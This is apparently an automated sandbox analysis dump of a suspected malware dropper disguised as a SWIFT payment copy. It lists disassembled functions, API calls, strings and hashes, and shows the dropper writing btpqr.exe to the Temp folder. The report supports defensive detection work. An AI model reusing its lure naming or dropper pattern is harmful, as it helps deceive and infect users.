                                                                                                                        • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,pkfcbfzkpkrqtkjcmcyn Setup), ref: 00403CFD
                                                                                                                        • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                                                        Strings
                                                                                                                        • pkfcbfzkpkrqtkjcmcyn Setup, xrefs: 00403CEE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                        • String ID: pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 184305955-275725890
                                                                                                                        • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                        • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                                                        • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                        • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040361A Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 235 40361a-403632 call 405f57 238 403634-403644 call 405b25 235->238 239 403646-40366d call 405aae 235->239 248 403690-4036b9 call 4038e3 call 40579b 238->248 244 403685-40368b lstrcatA 239->244 245 40366f-403680 call 405aae 239->245 244->248 245->244 253 403740-403748 call 40579b 248->253 254 4036bf-4036c4 248->254 260 403756-40377b LoadImageA 253->260 261 40374a-403751 call 405be9 253->261 254->253 256 4036c6-4036ea call 405aae 254->256 256->253 262 4036ec-4036ee 256->262 264 403781-4037b7 RegisterClassA 260->264 265 40380a-403812 call 40140b 260->265 261->260 266 4036f0-4036fd call 4056e5 262->266 267 4036ff-40370b lstrlenA 262->267 268 4038d9 264->268 269 4037bd-403805 SystemParametersInfoA CreateWindowExA 264->269 278 403814-403817 265->278 279 40381c-403827 call 4038e3 265->279 266->267 273 403733-40373b call 4056ba call 405bc7 267->273 274 40370d-40371b lstrcmpiA 267->274 272 4038db-4038e2 268->272 269->265 273->253 274->273 277 40371d-403727 GetFileAttributesA 274->277 281 403729-40372b 277->281 282 40372d-40372e call 405701 277->282 278->272 288 4038b0-4038b8 call 404f85 279->288 289 40382d-403847 ShowWindow call 405ee9 279->289 281->273 281->282 282->273 296 4038d2-4038d4 call 40140b 288->296 297 4038ba-4038c0 288->297 294 403853-403865 GetClassInfoA 289->294 295 403849-40384e call 405ee9 289->295 300 403867-403877 GetClassInfoA RegisterClassA 294->300 301 40387d-4038a0 DialogBoxParamA call 40140b 294->301 295->294 296->268 297->278 302 4038c6-4038cd call 40140b 297->302 300->301 306 4038a5-4038ae call 40356a 301->306 302->278 306->272
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000), ref: 0040368B
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403713
                                                                                                                        • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 0040371E
                                                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403767
                                                                                                                          • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                                                        • RegisterClassA.USER32 ref: 004037AE
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                                                        • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FF
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
                                                                                                                        • RegisterClassA.USER32(0042E3C0), ref: 00403877
                                                                                                                        • DialogBoxParamA.USER32(?,00000000,004039B0,00000000), ref: 00403896
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$dk_
                                                                                                                        • API String ID: 1975747703-2632298905
                                                                                                                        • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                        • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                                                        • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                        • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402C55 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40589e 312 402ca5-402caa 309->312 313 402caf-402cdd call 405bc7 call 405701 call 405bc7 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 324 402ce8-402cff 321->324 328 402dda-402ddd 322->328 329 402e2d-402e32 322->329 326 402d01 324->326 327 402d03-402d05 call 4030b0 324->327 326->327 333 402d0a-402d0c 327->333 331 402e01-402e2b GlobalAlloc call 4030e2 call 402e8e 328->331 332 402ddf-402df0 call 4030e2 call 4030b0 328->332 329->314 331->329 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 340 402d95-402d99 335->340 341 402d1b-402d2f call 40585f 335->341 336->329 345 402da3-402da9 340->345 346 402d9b-402da2 call 402bf1 340->346 341->345 358 402d31-402d38 341->358 351 402db8-402dc2 345->351 352 402dab-402db5 call 405fc6 345->352 346->345 349->329 355 402df9-402dff 349->355 351->324 359 402dc8 351->359 352->351 355->329 355->331 358->345 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->345 366 402d43-402d4a 364->366 365->365 368 402e65-402e80 SetFilePointer call 40585f 365->368 366->345 367 402d4c-402d53 366->367 367->345 369 402d55-402d75 367->369 372 402e85 368->372 369->329 371 402d7b-402d7f 369->371 373 402d81-402d85 371->373 374 402d87-402d8f 371->374 372->314 373->359 373->374 374->345 375 402d91-402d93 374->375 375->345
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,00000400), ref: 00402C82
                                                                                                                          • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 004058A2
                                                                                                                          • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00402CCE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$Ta_$soft
                                                                                                                        • API String ID: 4283519449-1504715776
                                                                                                                        • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                        • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                                                        • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                        • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402E8E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb4 445->447 446->447 448 402eb6 447->448 449 402ebd-402ec2 447->449 448->449 450 402ed2-402edf call 4030b0 449->450 451 402ec4-402ecd call 4030e2 449->451 455 402ee5-402ee9 450->455 456 40305b 450->456 451->450 457 403044-403046 455->457 458 402eef-402f38 GetTickCount 455->458 459 40305d-40305e 456->459 463 403048-40304b 457->463 464 40309b-40309f 457->464 460 4030a6 458->460 461 402f3e-402f46 458->461 462 4030a9-4030ad 459->462 460->462 465 402f48 461->465 466 402f4b-402f59 call 4030b0 461->466 469 403050-403059 call 4030b0 463->469 470 40304d 463->470 467 403060-403066 464->467 468 4030a1 464->468 465->466 466->456 479 402f5f-402f68 466->479 473 403068 467->473 474 40306b-403079 call 4030b0 467->474 468->460 469->456 478 4030a3 469->478 470->469 473->474 474->456 482 40307b-40308e WriteFile 474->482 478->460 481 402f6e-402f8e call 406034 479->481 488 402f94-402fa7 GetTickCount 481->488 489 40303c-40303e 481->489 484 403040-403042 482->484 485 403090-403093 482->485 484->459 485->484 487 403095-403098 485->487 487->464 490 402fa9-402fb1 488->490 491 402fec-402ff0 488->491 489->459 494 402fb3-402fb7 490->494 495 402fb9-402fe9 MulDiv wsprintfA call 404eb3 490->495 492 403031-403034 491->492 493 402ff2-402ff5 491->493 492->461 498 40303a 492->498 496 403017-403022 493->496 497 402ff7-40300b WriteFile 493->497 494->491 494->495 495->491 502 403025-403029 496->502 497->484 501 40300d-403010 497->501 498->460 501->484 503 403012-403015 501->503 502->481 504 40302f 502->504 503->502 504->460
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                                                        • wsprintfA.USER32 ref: 00402FD5
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0041BA19,7FFFFFFF,00000000), ref: 00403003
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FileWritewsprintf
                                                                                                                        • String ID: ... %d%%$HLA$HLA
                                                                                                                        • API String ID: 4209647438-295942573
                                                                                                                        • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                        • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                                                        • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                        • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 505 401751-401774 call 402a29 call 405727 510 401776-40177c call 405bc7 505->510 511 40177e-401790 call 405bc7 call 4056ba lstrcatA 505->511 516 401795-40179b call 405e29 510->516 511->516 521 4017a0-4017a4 516->521 522 4017a6-4017b0 call 405ec2 521->522 523 4017d7-4017da 521->523 530 4017c2-4017d4 522->530 531 4017b2-4017c0 CompareFileTime 522->531 525 4017e2-4017fe call 40589e 523->525 526 4017dc-4017dd call 40587f 523->526 533 401800-401803 525->533 534 401876-40189f call 404eb3 call 402e8e 525->534 526->525 530->523 531->530 536 401805-401847 call 405bc7 * 2 call 405be9 call 405bc7 call 405488 533->536 537 401858-401862 call 404eb3 533->537 548 4018a1-4018a5 534->548 549 4018a7-4018b3 SetFileTime 534->549 536->521 569 40184d-40184e 536->569 546 40186b-401871 537->546 550 4028c7 546->550 548->549 552 4018b9-4018c4 FindCloseChangeNotification 548->552 549->552 553 4028c9-4028cd 550->553 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4018e2-4018e5 call 405be9 555->558 559 4018cf-4018e0 call 405be9 lstrcatA 555->559 556->550 563 4018ea-402246 call 405488 558->563 559->563 563->553 563->556 569->546 571 401850-401851 569->571 571->537
                                                                                                                        APIs
                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 00405BD4
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1941528284-152042057
                                                                                                                        • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                        • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                                                        • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                        • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405375 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 572 405375-4053c0 CreateDirectoryA 573 4053c2-4053c4 572->573 574 4053c6-4053d3 GetLastError 572->574 575 4053ed-4053ef 573->575 574->575 576 4053d5-4053e9 SetFileSecurityA 574->576 576->573 577 4053eb GetLastError 576->577 577->575
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                        • GetLastError.KERNEL32 ref: 004053CC
                                                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                                                        • GetLastError.KERNEL32 ref: 004053EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                        • API String ID: 3449924974-1356718401
                                                                                                                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                                                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405EE9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 578 405ee9-405f09 GetSystemDirectoryA 579 405f0b 578->579 580 405f0d-405f0f 578->580 579->580 581 405f11-405f19 580->581 582 405f1f-405f21 580->582 581->582 583 405f1b-405f1d 581->583 584 405f22-405f54 wsprintfA LoadLibraryExA 582->584 583->584
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                        • wsprintfA.USER32 ref: 00405F39
                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                                                        • API String ID: 2200240437-4240819195
                                                                                                                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                                                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004058CD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 585 4058cd-4058d7 586 4058d8-405902 GetTickCount GetTempFileNameA 585->586 587 405911-405913 586->587 588 405904-405906 586->588 590 40590b-40590e 587->590 588->586 589 405908 588->589 589->590
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004058E0
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
